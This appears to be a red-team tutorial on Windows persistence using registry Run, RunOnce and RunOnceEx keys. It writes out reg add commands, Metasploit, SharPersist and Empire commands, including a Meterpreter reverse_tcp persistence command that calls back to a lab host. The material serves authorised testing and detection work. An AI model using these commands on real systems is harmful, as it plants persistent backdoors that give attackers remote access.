Getting an initial foothold inside a network during a red team operation is a time consuming task. Therefore persistence is key to a successful red team operation as will enable the team to focus on the objectives of the engagement without losing the communication with the command and control server.

Creating registry keys that will execute an arbitrary payload during Windows logon is one of the oldest tricks in the red team playbooks. This persistence technique requires the creation of registry run keys. Various threat actors and known tools such as Metasploit, Empire and SharPersist provide this capability therefore a mature SOC team will be able to detect this malicious activity.

Terminal

Registry keys can be added from the terminal to the run keys to achieve persistence. These keys will contain a reference to the actual payload that will executed when a user logs in. The following registry locations is known to be used by threat actors and red teams that use this method of persistence.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

If elevated credentials have been obtained it is preferred to use the Local Machine registry locations instead of the Current User as the payload will executed every time that the system boots regardless of the user who is authenticating with the system.

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"

During the next logon the payloads will executed and will communicate back to Meterpeter.

Oddvar Moe discovered two more registry locations that could allow red teams to achieve persistence by executing either an arbitrary payload or a DLL. These will be executed during logon and require admin level privileges.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"

Metasploit

Metasploit Framework supports persistence via the registry by using a Meterpreter script and a post exploitation module. The Meterpreter script will create a payload in the form of a VBS script which will be dropped to disk and will create a registry key that will run the payload during logon of the user.

run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21

The next time that the user will login with the system a new Meterpreter session will open.

Alternatively there is a post exploitation module which can be used for persistence. The module require the following configuration and will drop an executable at a writable location on the compromised system.

use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run

The module will use the registry location of the current user since the USER has been selected as an option.

The module can be configured to create a registry key in the HKLM location if SYSTEM level privileges have been obtained. The STARTUP option will need to be changed to SYSTEM.

set STARTUP SYSTEM

SharPersist

SharPersist is a tool developed by Brett Hawkins in C# that combines a variety of persistence techniques including the addition of registry run keys. This toolkit can be loaded into various command and control frameworks that support reflective loading such as Cobalt Strike and PoshC2. The following command will create a registry key that will execute an arbitrary payload from the same registry location as the Metasploit Framework modules.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hkcurun" -v "pentestlab" -m add

If elevated access has been obtained modifying the command to install the registry key in the Local Machine location to achieve persistence for all users.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hklmrun" -v "pentestlab" -m add -o env

SharPersist contains also persistence capabilities via the RunOnce and RunOnceEx registry keys. The following commands will create registry keys in these locations that will execute arbitrary payloads.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonce" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonceex" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hkcurunonce" -v "Pentestlab" -m add

SharPersist provides also an option to use another registry location for persistence (UserInitMprLogonScript).

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "logonscript" -m add

Empire

Empire contains two modules that are aligned with the persistence technique via Registry Run keys if Empire is being used as a command and control. Depending on the level of privileges these modules will attempt to install a base64 payload in the following registry locations:

• HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
• HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug

usemodule persistence/userland/registry
usemodule persistence/elevated/registry*

Another registry key will be created under the name Updater that will contain the command to execute. PowerShell will attempt to run in the next logon the payload that is stored in the Debug key to achieve persistence.

• HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run

References

• https://github.com/fireeye/SharPersist
• https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
• https://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
• https://www.fireeye.com/blog/threat-research/2019/09/sharpersist-windows-persistence-toolkit.html
• https://attack.mitre.org/techniques/T1060/